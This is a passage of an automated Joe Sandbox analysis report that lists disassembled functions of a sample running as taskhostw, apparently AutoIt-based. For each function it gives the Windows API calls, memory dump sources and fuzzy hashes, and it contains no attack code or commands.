Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
Instruction ID: 3187a2ed513d6ea1d8f16c50d2ccb87a697a13e7023e89186d3ece94107fd031
Opcode Fuzzy Hash: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
Instruction Fuzzy Hash: 2451CF35A00705DBDB248FA9CC8066EBBB6FF88324F148729E825962D0DF719950DB48

Function 002300C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230188
RegOpenKeyExW.ADVAPI32 ref: 002301C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0023020E
RegCloseKey.ADVAPI32(?), ref: 0023023A
RegCloseKey.ADVAPI32(00000000), ref: 00230247

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 3524f337d81e5ac289a0ce406292cecc7ee2f7cf111ea8cd747b7299e5bfdc7f
Instruction ID: 4fb7cf7775a83b28815c08476ab610b60eb7e2f37b8e3b220840d86bb9b07bca
Opcode Fuzzy Hash: 3524f337d81e5ac289a0ce406292cecc7ee2f7cf111ea8cd747b7299e5bfdc7f
Instruction Fuzzy Hash: 80516C71218201AFD704EF64DC95FAAB7E8FF84704F04892DF595872A1DB30E915CB62

Function 0021E5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 0021E6AB
GetPrivateProfileSectionW.KERNEL32 ref: 0021E6D4
WritePrivateProfileSectionW.KERNEL32 ref: 0021E713

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

WritePrivateProfileStringW.KERNEL32 ref: 0021E738
WritePrivateProfileStringW.KERNEL32 ref: 0021E740

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 9e4ccf8ac941d1d652e9673dad9e39bb61374ad8562a2bc25f2ffb607943bd07
Instruction ID: c0bee3e181b216ad5204e602bb8653c384d4a1f0b62c5b2f918c9988ac99a214
Opcode Fuzzy Hash: 9e4ccf8ac941d1d652e9673dad9e39bb61374ad8562a2bc25f2ffb607943bd07
Instruction Fuzzy Hash: CF513935A00205EFCF01EF64C985AAEBBF5EF19314B148099E94AAB362CB31ED51CB50

Function 0023A088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917f73987458abaddd72490a7f14154a95088facdb4b03b8798780d221cf2d1d
Instruction ID: 2d8c82cf2ad6637b080e5e696a546a695f8bcea26888b86cc0e7afdb3e001fa0
Opcode Fuzzy Hash: 917f73987458abaddd72490a7f14154a95088facdb4b03b8798780d221cf2d1d
Instruction Fuzzy Hash: 7E4117B5D20115AFCB10DF28DC49FA9BBA8EB09320F150275F8EEA72E1C7709D61DA51

Function 001B2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001B2357
ScreenToClient.USER32(002757B0,?), ref: 001B2374
GetAsyncKeyState.USER32 ref: 001B2399
GetAsyncKeyState.USER32 ref: 001B23A7

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 20ac6ec53111be6abeb9cf792b78c35f8b42ce0c4b35bfb4626513f02bc6d186
Instruction ID: 4b8b3da1bc6ae657397eba5a7034cf6be546de9192846648f24e6ebe60da8e8a
Opcode Fuzzy Hash: 20ac6ec53111be6abeb9cf792b78c35f8b42ce0c4b35bfb4626513f02bc6d186
Instruction Fuzzy Hash: C541A375904505FBCF199F65CC48AEDBBB4FB09360F10432AF829922A1C7346995DFD0

Function 00206700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020673D
TranslateAcceleratorW.USER32(?,?,?), ref: 00206789
TranslateMessage.USER32(?), ref: 002067B2
DispatchMessageW.USER32(?), ref: 002067BC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002067CB

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 5ebf386b71c104a7a9978e0516c635fd767cf17b5503573801645443cd91ea90
Instruction ID: 2c010a6a6243f30a8ebc465a9a3afec880d3b1d6c43917792f6088fb479669b1
Opcode Fuzzy Hash: 5ebf386b71c104a7a9978e0516c635fd767cf17b5503573801645443cd91ea90
Instruction Fuzzy Hash: 0A31B2309207179BDB208FB4A84DFA6FBACEB04308F144125E425C60F2E765A8B9DB60

Function 00208CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00208CF2
PostMessageW.USER32 ref: 00208D9C
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00208DA4
PostMessageW.USER32 ref: 00208DB2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00208DBA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 22ca984d3fc62d53655b9025caf4e2667ca435ffb3af3f85a39f4a66c61e6340
Instruction ID: 100f07e862b52db529da05cae49e39fda2d7c54ad9312027608af5ac047cd3bb
Opcode Fuzzy Hash: 22ca984d3fc62d53655b9025caf4e2667ca435ffb3af3f85a39f4a66c61e6340
Instruction Fuzzy Hash: 6231DF3190021AEBDB04CF78E94DA9F3BB5EB14315F104329F968E61D1C7B09924CB90

Function 02AB3AF8 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 02AB3B62
_memmove.LIBCMT ref: 02AB3B75
_strcat.LIBCMT ref: 02AB3B8E
_wcscpy.LIBCMT ref: 02AB3BA5
_wcscpy.LIBCMT ref: 02AB3BC1

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscpy$_memmove_strcat
String ID:
API String ID: 559723171-0
Opcode ID: 39c3ec6b07b3e279c347239306d99adfbd8a5880f3e22440b46f4ae307d65432
Instruction ID: 80d9bacb57ef30ec0114e0af4499369c8ed765936babb636ee0a084b93c8f5a0
Opcode Fuzzy Hash: 39c3ec6b07b3e279c347239306d99adfbd8a5880f3e22440b46f4ae307d65432
Instruction Fuzzy Hash: E711D232904114ABDF21B760DD89EDE77ACDF01710F0405FAE549D6092EF759A85CB68

Function 02AAB360 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 02AAB375
_memcmp.LIBCMT ref: 02AAB393
_memcmp.LIBCMT ref: 02AAB3A6
_memcmp.LIBCMT ref: 02AAB3BE
_memcmp.LIBCMT ref: 02AAB3D6

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
Instruction ID: 93b36d84c210b1fba4bdb28c1e6f4a245874b0c2f09b6ec75657204d937e526e
Opcode Fuzzy Hash: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
Instruction Fuzzy Hash: 32018CB26401097BA70466119E91F7F776DAE20288F004462FD0497A41FFA4EE10C6F9

Function 00214B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00214B61
__beginthreadex.LIBCMT ref: 00214B7F
MessageBoxW.USER32 ref: 00214B94
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00214BAA
CloseHandle.KERNEL32(00000000), ref: 00214BB1

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 95a4b867c573ff56a9d3fbbc7919eb82bab6c64f72bcde58bba275f52c7a50a1
Instruction ID: 4572f89229037ed9cf79c6906643ef1ba23b9416e2e63760f8724ed541ceb14d
Opcode Fuzzy Hash: 95a4b867c573ff56a9d3fbbc7919eb82bab6c64f72bcde58bba275f52c7a50a1
Instruction Fuzzy Hash: 1C114C72D04619BBC7009FB8FC08ADA7FECAB55324F140265FC18D3251D6B1CD8087A0

Function 0020852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00208546
GetLastError.KERNEL32(?,0020800A,?,?,?), ref: 00208550
GetProcessHeap.KERNEL32(00000008,?,?,0020800A,?,?,?), ref: 0020855F
HeapAlloc.KERNEL32(00000000,?,0020800A,?,?,?), ref: 00208566
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020857D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d6463d8c0cfa1429c3d43d2430051e8e4f76ea54eb9e231c51890bfdee8b58f6
Instruction ID: 8a99a9afa6f820ece5f2d0a19cd2a9740593c16c2d8f11931d03a2ceb9779803
Opcode Fuzzy Hash: d6463d8c0cfa1429c3d43d2430051e8e4f76ea54eb9e231c51890bfdee8b58f6
Instruction Fuzzy Hash: 00014B71610215EFDB214FA6FD4CD6B7FACEF89355754056AF889D2260DA328D10CA60

Function 002083D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002083E8
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002083F2
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00208401
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00208408
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0020841E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 716d03617d298dbbc13a22f92f62584cb11504655de6f27419e41319792b0b05
Instruction ID: 4aed2dcb07b431287eb0ca7b2dc4cdb26e84e3b0cc3616cdc247b0b74f6e33e0
Opcode Fuzzy Hash: 716d03617d298dbbc13a22f92f62584cb11504655de6f27419e41319792b0b05
Instruction Fuzzy Hash: 92F0C230614306EFEB101FA4FC8CE6B3BACEF89764B400025F989C21A1CB70DC55DA61

Function 00208432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00208449
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00208453
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00208462
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00208469
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0020847F

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 95ec95a30dc6b47f9d9971ae824283c0ac41d9e8f32cf2ee2b310c738d54e28c
Instruction ID: 488f96ab579b7179945ee837f3e7ad9816d7896116155dd257323bf18056595d
Opcode Fuzzy Hash: 95ec95a30dc6b47f9d9971ae824283c0ac41d9e8f32cf2ee2b310c738d54e28c
Instruction Fuzzy Hash: 52F0A930210306EFEB611FA4FCCCEAB3FACEF89754B040029F989C31A1CA609814DA70

Function 0020C4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0020C4B9
GetWindowTextW.USER32(00000000,?,00000100), ref: 0020C4D0
MessageBeep.USER32(00000000), ref: 0020C4E8
KillTimer.USER32 ref: 0020C504
EndDialog.USER32 ref: 0020C51E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 62032d139b9e554a9fbce2442103462c34f431aed5c7a936fa274d564fde4453
Instruction ID: 7e68451e41f12d54965b328c3e9cdd79c553c6a7832dd1b501ff231a5c4bf366
Opcode Fuzzy Hash: 62032d139b9e554a9fbce2442103462c34f431aed5c7a936fa274d564fde4453
Instruction Fuzzy Hash: AF016D70910705ABEB205F20FE4EBA67BBCFF00705F100669E592A14E2DBE4A9658E80

Function 02A55FEC Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 478COMMON

Download Yara Rule

Strings

EA06, xrefs: 02A8DBAB
AU3!, xrefs: 02A560C1

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _iswctype_wcscpy
String ID: AU3!$EA06
API String ID: 2497406411-2658333250
Opcode ID: 539d3749f4906b8c3445b0c6d9bae553d1ce24399277511170f8d7484687ce52
Instruction ID: c377cfcfd22d1372a85ee2746ff545a289cd5460e856cdd5c4e8160c7d0011fe
Opcode Fuzzy Hash: 539d3749f4906b8c3445b0c6d9bae553d1ce24399277511170f8d7484687ce52
Instruction Fuzzy Hash: 2D027B715483519FC724EF24C990AAFBBEAAF99714F40491DF88A932A0DF30D949CF52

Function 02ABDFAF Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 02A58D97: __itow.LIBCMT ref: 02A58DC2
Part of subcall function 02A58D97: __swprintf.LIBCMT ref: 02A58E0C

Part of subcall function 02A6F206: _wcscpy.LIBCMT ref: 02A6F229

_wcstok.LIBCMT ref: 02ABE120
_wcscpy.LIBCMT ref: 02ABE1AF
_memset.LIBCMT ref: 02ABE1E2

Strings

X, xrefs: 02ABE21F

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 8a11e38c64d04a955871b7e9f367fc6abc6331618def36d67b5de071bbf1d687
Instruction ID: 5330d118b265c73dc4e36b44aba2279cf9d8d840752bd867f0f94e41705ae3f9
Opcode Fuzzy Hash: 8a11e38c64d04a955871b7e9f367fc6abc6331618def36d67b5de071bbf1d687
Instruction Fuzzy Hash: 61C17D715483109FD725EF24CA80A9BB7E9BF84314F40496DE8999B2A1DF30EC45CF82

Function 02A6225B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 02A70336: std::exception::exception.LIBCMT ref: 02A7036C
Part of subcall function 02A70336: __CxxThrowException@8.LIBCMT ref: 02A70381

Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382

Part of subcall function 02A56FB1: _memmove.LIBCMT ref: 02A5700B

__swprintf.LIBCMT ref: 02A6242D

Strings

(+I, xrefs: 02A62454, 02A624B1, 02A62458

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: (+I
API String ID: 1943609520-2960116247
Opcode ID: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
Instruction ID: 2e2cf518d146b457ec19128515c6ac0683b2daa16bbd91497e70975c1adac4a4
Opcode Fuzzy Hash: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
Instruction Fuzzy Hash: 74914B715582119FCB14EF24C98897FB7A9EF89B00F40496EF8569B2A0DF30E948CB52

Function 001C2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 001D0F36: std::exception::exception.LIBCMT ref: 001D0F6C
Part of subcall function 001D0F36: __CxxThrowException@8.LIBCMT ref: 001D0F81

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

Part of subcall function 001B7BB1: _memmove.LIBCMT ref: 001B7C0B

__swprintf.LIBCMT ref: 001C302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001C2EC6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: c3dafd78060bedf27c5af26cea18463b76bee0d4f8ad4fe5e87cd8586bbbdd84
Instruction ID: c9376fce6f4567a73a369ce6b33568a71d1cb65e0e0fa25ccb80fe79e639d147
Opcode Fuzzy Hash: c3dafd78060bedf27c5af26cea18463b76bee0d4f8ad4fe5e87cd8586bbbdd84
Instruction Fuzzy Hash: 66917D321082059FC718EF24C895DAFB7A5EFA5710F04491EF595972A2DB30EE44CB52

Function 001D017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 001D01B7
#, xrefs: 001D01C0

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 119add5bba360e631dc5f87081a575dbbd15c46c6d6c2f5d9aecf6295a22cc9c
Instruction ID: e5352cbe04a85e2e08c70564b5a83dc0f689867177f7653fc32154fbd9ff8ff0
Opcode Fuzzy Hash: 119add5bba360e631dc5f87081a575dbbd15c46c6d6c2f5d9aecf6295a22cc9c
